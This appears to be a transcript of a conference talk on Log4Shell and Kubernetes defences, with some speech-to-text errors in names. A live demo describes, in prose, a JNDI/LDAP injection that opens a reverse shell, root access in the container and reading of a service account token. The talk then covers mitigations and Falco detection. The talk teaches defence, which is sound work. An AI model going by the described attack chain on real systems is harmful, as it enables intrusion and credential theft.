 I'm Eric Smalling. I'm a developer advocate at Sneak and Alba. I'm Alba Ferry. I'm a senior product marketing manager at SISD. And we are here today to talk about vanquishing vulnerabilities here in Valencia. Yeah. Not in vulnerability. We're not in vulnerability. Quick agenda, just we don't have a lot of time, so hopefully I don't go too fast. We're going to first talk, we'll quickly talk some terminology. I think everyone here knows what a lot of that is. Then I'm going to get right into a demonstration of a remote code execution. I'm going to demonstrate a log4j, log4shell exploit so that you can see, if you've not seen it before, how ridiculously easy it is to do. And then we're going to talk about some proactive measures you can use to minimize blast radius for vulnerabilities like that that you didn't see coming. Zero days or things that you don't know if you have or not. And then Alba's going to talk then about detecting that kind of behavior for anything that slips by so that you can be alerted should something be happening in your cluster. So as I said, most of this terminology everybody in this room understands. The main one I'm going to talk about today for at least my side of the talk is mitigation. Counter measures you can use to prevent a threat or at least reduce its impact to you in the real world. So enough talk and slides. Let's get to a demo. So what you're seeing here is a J2, let me start the scene kind of. We have a J2EE application, two tier. It's got a front end that's obviously certain Java and then MySQL back end running in separate pods on a Kubernetes cluster out in EKS. And please, conference Wi-Fi, stay working. Otherwise we'll have to drop to a recording and I hate doing that. So on the center here we have Octant running just monitoring the logs of this Java application. And then on the left you'll see what's going to happen over there in a minute. So I'm going to sign into my application. And of course my one password has locked out. Here we go. This is un momento por favor. Clear my session out. Try that again. We're going to log in. Proof that I'm doing it live. So this, again, is just a simple application. If you've seen any of my talks before, you've probably seen this. It's just a to-do list. And if I search for something, like a car to do, you'll see that it finds that and it shows the car. And if I come back over here and, again, live demos, let me refresh this page. Sometimes Octant loses its connection when Wi-Fi goes in and out. Oops. Ah, come on, Octant. There we go. Logs. OK, well, Octant's not going to cooperate with me. So we'll just open another terminal and do this the good old fashioned way. Logs. Follow. Javgu. Come on, Octo-complete. Remember what I said about conference Wi-Fi? There we go. Good grief. Not found. I must have bounced my pod since I did that last. There we go. There we go. Ignore the errors before that. Again, so we see searching for car has happened. Ignore all this other stuff from the test runs I've done. But what we have here is the application is very likely logging what we do as we go along. All of our applications do that. What the interesting thing about the log4j vulnerability, if you haven't looked into what it was and why it's so pernicious, is that it allowed a JNDI, or Java naming discovery, in face lookup, using an LDAP external server. And what happens is you come in here, and I'm going to use this and copy the string, because it's easier than typing it. It allows me to insert something here. And instead of a normal string to search for, I'm searching for an interpolated thing. So you've got to grow that font for you. I've got a dollar curly brace. And then I've got the protocol for LDAP. And I'm pointing to this LDAP server somewhere on a dark web domain with a context of a remote shell. Now, before I start that, I'm going to go to this other tab over here. And this is just another instance running in EC2 somewhere. It doesn't matter where it is. I'm just listening with NATCAT on the port 9000 in this case. Now, if I hit Go here, you see a connection. This happened. I do an LS. I now have a shell into the Tomcat server that is running on that application that's running it. I can pull my environment so I can see all sorts of nice information there, including the fact that I'm in a Kubernetes cluster because of all the environment variables that fit that. There's all sorts of meat juicy information here I can get at. I can get at the internal IP of the API server for the control plan in this cluster. Let's do what else I can see. Let's do a DF. Hey, it looks like since this is pre-124 Kubernetes, the default service account token might be out there. So let's copy that and see if I can see that slash token. And there it is. So I can start as a bad actor, start expanding my exploit. Remote code execution exploits happen. You're going to have them occasionally. You need to stay patched. And it's obviously important to scan your code, scan your containers, make sure that as they come up, you're patching those and getting them out of the way. But as it has happened with many companies with this exploit in December, they were caught off guard. It happened so fast, and so many people were vulnerable that everyone was scrambling to figure out, do I have this problem? And what the heck do I do before I can get this patch out the door? So what are some of the other things I can do here? I could use that to try going after the API, but who am I? Let's see what user I'm. Oh, I'm root. That's handy. If you didn't know, many open source official images out on the main registries do default in Docker containers. By default, default to root user. Well, we'll get into why that's good or bad in a minute. Let's see. Can I touch a file in a directory and do an LSLTR on Etsy? Yes, I just created a foo. You can see that's the bottom of the screen. I created a foo file in the Etsy directory. This tells me not only that, A, yes, I am root, and I have the ability to do that, it's a read-write file system in this container. So I can do things to it. Let's say, let's see if I can run nmap. Oops, if I can type. Oh, come on, Wi-Fi. So I have nmap available. That's cool. Let's see if I have curl available, just while I'm typing things. Let's do, I don't know, Google. That's always a good one to check. And yes, so I have curl available at my disposal. I happen to have nmap on this box. This is because I was hacking on it earlier, honestly. That wasn't supposed to already be there. Let's pretend nmap wasn't there. I wonder if I can even just do this. Yes, so I have access to app repositories, whether they be on the internet or some company internal. So I can start expanding my exploit very easily on this machine. So as I said, let's say you're at this company and you're freaking out now because this exploit has come out in December and you're trying to figure out what do I need to do? Well, if there's some mitigation things you could have done ahead of time to minimize a lot of what I just showed you. First of all, the image I'm using, if I were to go look at the Docker file, this is an official Tomcat image at version whatever. And that you would think would have the JDK, the bits of the distribution, but it's also gonna have things like Curl, as you saw. It's got Bash in there, it's got WGit. It could even have Vim. Who knows what all is in this thing? It's a very fat container. And by being a fat container, you're giving a lot of tools to bad actors to use against you. What you really wanna do is try to stick to smaller image sizes to start with. You ideally just want the open JDK. Now, maybe you wanna have a shell in there for things that you need to run as part of your startup or whatever, but minimize that image size down so you're not providing tools to the bad actors. To do this, there are too many things to talk about in the short time we have today, but you can look at slim images. You could look at distrilous images from the Google open source folks. Those are very minimal images. Just make sure they work for your team. You don't wanna go to distrilous and then I'll say, oh, I need this other tool and then you've gotta build it from binary and include it yourself and become sysadmins as developers. That's not always the best solution, but find the right solution that minimizes the image size. Understand how layers work. If you're new to containers, you might think that I can just put a run rmcurl and get rid of that curl. That's not how it works. It just hides it in the images and if somebody were like in yesterday's CTF demonstration, somebody were to start up a privileged container, I now can mount the host file system very easily and get at those hidden layers that are in the var run container, whatever directories. I don't know, I'm running out of time so I'm gonna hurry up here. Practice good build strategies. If you're using Docker files, use multi-stage builds so that your final stage can be as minimal as you can make it. In most places, you wanna have repeatable builds so that every time you build from a given commit hash, you get the same image out so it's predictable and deterministic and look at alternative tools. If you're a Java shop, I'm a big fan of Jib which is a 100% Java based image building tool that you can put right into your Maven or Gradle tools if you're in Go, look at Co, K.O. There's a bunch of other tools you can be using that you can really standardize to your organization's needs. And then finally, there is entire conferences dedicated to this now. I can't go into secure supply chain in two seconds but what I wanna mention here is you wanna make sure that wherever your images are coming from, you have an audit trail for them, a chain of custody, if you will and only automation should be putting those images into whatever managed registries you're using. Eric's Docker build based image should never be being shipped to anybody, anywhere that's important. Now let's talk about actual things you can do to minimize what I did there beyond smaller images. Don't run as root in your containers. It's very, very rare that you need and especially in business e-commerce type applications that you need to have a root user running your application. You might have something very specific and that's a topic we can talk about at the booth later but you probably don't need it so switch to a lower privileged user because when you're UID zero in a container even though you're contained, you're UID zero and if you can break out into the file system of the host as you can imagine what you can do. Privilege containers as we saw yesterday again in the CTF training, if you got a privileged container you own the box, you have access to mount devices from the root, you all sorts of stuff. Unless you're like Balco or something that needs privileged access, you don't need privilege. Linux capabilities is the same kind of a thing. Most business applications can safely drop all capabilities. Just add back the ones you need. If you can't run without Netcap ad for some reason, figure out why you need that because that's kind of odd for a business ad but just add the capabilities you need and then finally the read-only root file system. Being immutable is a good thing in many ways. It's not, none of these are silver bullets but it does make life harder. I would not have been able to run apt-get update or install or any of those kinds of tools if I'm trying to modify, mutate a file system that's read-only from the beginning. So, but the big one I wanna really hit on is network policy. A lot of us in security discussions don't really, we kind of ignore network policy or for developers like myself, first time I look at network policy I'm like I'm not a network admin, I don't understand how to do firewalls, I don't know, it's not that hard. Network policy is one of my favorite tools and for Log4j it's a great way to minimize the blast radius because what was the happy path of what should have been happening was user hits web app, web app hits DB, that's the network path that should be happening. But what's really happening is the web app is then sending a connection out to an LDAP server or a quasi LDAP server, foe one and then it is returning and then calling another HTTP server that's returning an evil object which in turn is then calling back out to some port somewhere. In this case it was my other EC2 instance. Those orange connection lines should not be happening. Network policy allows you to specify ingress and egress rules for TCP, UDP across your deployment and you can just say hey using selectors what pods can and can't talk to each other. I'm a fan of the deny all style pattern where you start with nothing working. Everything is broken, obviously the app doesn't work here but no ingress or egress from the pods is allowed. You wanna allow DNS so you have service discovery but beyond that nothing is allowed. Then you explicitly just add the rules you need for your application to work. In this case I need traffic to come in from users obviously and I need traffic to leave a web app towards the database and I need traffic into the database only from the web app. If you wanna see what that would look like if you're new to network policies I have another tab somewhere. I have too many screens open. Actually there's this one right here. Though I'm not gonna go through the minutia of all of the manifest here but you can see I've broken this up fairly granularly to be legible but we have a denial policy that's saying for the empty pod selector meaning all the pods in whatever name space I deploy this to. Ingress, egress, ingress the empty list means no ingress to anything. Egress, the only egress you're allowed is to port 53. In real world I'd be more specific than this to say you get the cube DNS but for this demo that's what I have. Then we wanna egress to from the Java Goof web app only to, I'm sorry ingress only to port 8080. That's where my Tomcat server is listening. And then finally we wanna say egress out of the Java web app to the Java DB. Now again I could be more specific and say ports and whatnot. And then similarly into the Java DB from the Java web app. And if we apply that let me quit out of that and do a K apply. K is alias to cube CTL because I'm lazy. And then I'll, if I apply this and I have no idea what my time is, hopefully I'm not doing all your time. In fact I'm worried about time. If I apply that now, if I go over back to my web app and just hit this again, what you're gonna see is it's spinning now. That orange line coming out of this box here is now blocked. And anybody attacking, yes I'm still vulnerable but I've mitigated and I've shrunk that last radius. Now I've turned an RCE into a potential denial of service. Maybe if they machine gun me right now and eat up a whole bunch of threads but it's still better than somebody having a shell in my cluster. So simple things like that can be done to help mitigate these things. And finally enforce these kinds of things I'm talking about with something like either Oki a gatekeeper, Kaferno, POT security admission is the new one coming in, next release. If you're using PSPs that's great but they're deprecated, moved to one of these. And with that I am going to hand over to, I'll book, is it, we're running out of time. Thank you. Okay, so with the time that I have left I'm going to be talking, can you hear me fine? Is it working? I'm going to be talking about detecting errant behavior. All those security controls and best practices that Eric walk us through are super valuable when we want to minimize the black radio when we want to protect our applications. Dev teams should really pay attention to all of these advices when they are building the applications like not running containers as road if you can, dropping capabilities, not leaving network tools that hackers can use in case they break in and also using admission controller as a last frontier before sending applications to production. Many of those are or apply better in the development phases of the application lifecycle. And that is what is known in the field as shift security level. But to detect errant behavior we want to look at the other side of the infinite loop. We want to look at productive environments. Here is where we want to detect errant behavior when we have our workloads running in production. Before we knew the log4j library had such a big vulnerability or even the most recent one, the spring force held. We didn't know our applications were at risk, right? Well, actually many of the applications running in productive environments right now are affected by vulnerabilities but they are still hidden or haven't been detected yet, right? So how can we be sure that we are protected? How can we shield right? We said in the beginning when we were going through the terminology that a thread is a path, a theoretical path, a way that a vulnerability is exploited. And we show in the demo that how to exploit the log4j vulnerability. So it became a real thread, right? We saw processes opening a reversal in a container and using network tools like Nmap. Well, in this case it wasn't there but Nmap and Cool, whatever. We saw processes writing below sensitive folders and even the access of application repositories, right? So we need to find ways to detect this suspicious activity so that's how we can find out that we are being attacked, right? So in order to shift right to protect our environment we need to be very aware of this errant behavior. But also we need to know what is the normal way our workloads behave, right? And when we think on containerized applications, well, we add that layer of abstraction, maybe two or three layers if you're using Kubernetes, right? But that's why they are so easy to use. In the same time we have COVIDs which is that limited visibility doesn't let us see it through as good as we could in a normal host, right? So if we know what are the normal conditions of our workloads we could be alerted when that behavior deviates from what is normal. So for that you can use thread detection engine like Falco, right? Falco is the first runtime security project that joined the CNCF in an incubation level project. It works in a streamlined fashion way and you can use it as a kernel module or EVPF program and it is built on top of two open source libraries. Let's see if I can pronounce them. Libscap, that's the easy one. And Libsins, these libraries let you intercept all the activity happening in a host and then using rules and filters you can send it to the rules engine, right? Because that is what we need. We need to be alerted as soon as suspicious activity happens in your production environment. We need this real-time detection, right? And Falco comes with a lot of default rules out of the box and talking about the default rules can I ask you Eric to pull out the messages that we had while doing the demo? We didn't tell you but we had Falco installation in the same cluster so let's see if we find anything. It's gonna fail, I'm just gonna pull a recording of when we did this before so you can see it. So yeah, here we have the notice known system binaries send network traffic and that is when we send the NGI stream in the web search form, right? And then I think we also had the right below ADC two or three lines below that and also when we were accessing the application repository. So just with this out of the box rules you can start detecting suspicious activity. I think we can go back to the slides. Okay, so yeah, but what happens if you want to detect suspicious activity that is not included in the activity that is happening in a host, right? Because at the end vulnerability exploits can affect a wide range of targets, okay? So let's say you want to monitor config changes that could be suspicious in a cloud account, okay? That information is not in the syscalls. So to extend Falco behavior they release a very cool functionality called the Falco plugins. Falco plugins are shared libraries that let us add different data sources and filter fields so we can use the same Falco rules engine to detect suspicious activity happening in other environments, right? So let's say that a hacker finds your cloud credentials in a GitHub repo. I know this is very unlikely to happen but let's pretend. So with that information a lot of damage can be done, right? Or even better, let's say that a hacker exploit a vulnerability that is in your workloads. So it becomes a real threat again. And then using lateral movement techniques they jump to the cloud account. So having those credentials they can spin up a new cluster, they can create additional users for later use or they can even access sensitive information that you may be storing in your buckets. So these are also threats at runtime, right? I don't know if you remember the Octa bridge that happened two months ago. For those of you who do not know Octa is an identity provider is the one that avoids us to be able to log in every time we change an application within our environment. Well, the community knew about the Falco plugin so they released a new plugin that you can use the Octa log events. So you can detect if suspicious activity is going on. So if you're an Octa user and you wonder if your credentials were compromised you can use the plugin to see if something weird is still going on in your account, right? So everyone can write their own plugin pretty easy. And then for my last slide I want to go back to the vulnerability topic here. When I was presenting Falco I said that it's built on top of two open source libraries. Well, you can use those libraries as a baseline for very cool projects. And if you want to know more about these projects talk to me after. But today I'm just bringing one of the possibilities and it is using those libraries as a runtime intelligence data source. Runtime intelligence is a technique that brings intelligence, knowledge about the behavior of the software, of the workloads at runtime, right? So with that you can get information about the commands that are being used, packages, libraries that are loaded in memory. So if you deal with the vulnerability nightmare, right? Of having to fix vulnerabilities and prioritize different tasks maybe it's a good idea you take this in consideration because it will help you prioritize in risk and just focusing on what you really need to fix, right? It can answer things like for all the libraries that you have in an application how many of those are really loaded in memory? Because at the end they're not as many as we think. And then for the ones that are loaded in memory how many of those have an actual exploit? Because sometimes CVEs are probably more like a theoretical thread but in reality there's no exploit on this. So just focus on the ones that can really pose a risk to your workloads. And also when we think about fixing vulnerabilities what we need is like a new fix, a new package version, right? So again if that package that is loaded in memory that has an exploit, if it doesn't have a fix I'm not saying you should forget but you can use that information to clear some of the noise that you have in your super long list of vulnerabilities to fix. And with that I think we're done and we made it. Okay, thank you very much. Were we fine? Yeah, this was a really nice talk. Any questions from the audience? I think we are time for maybe a couple of questions. Well, we will be in our booths throughout the week so right next to each other, Steve and Satik. So come see us. Yeah, okay, yeah. Thank you. Thanks Eric.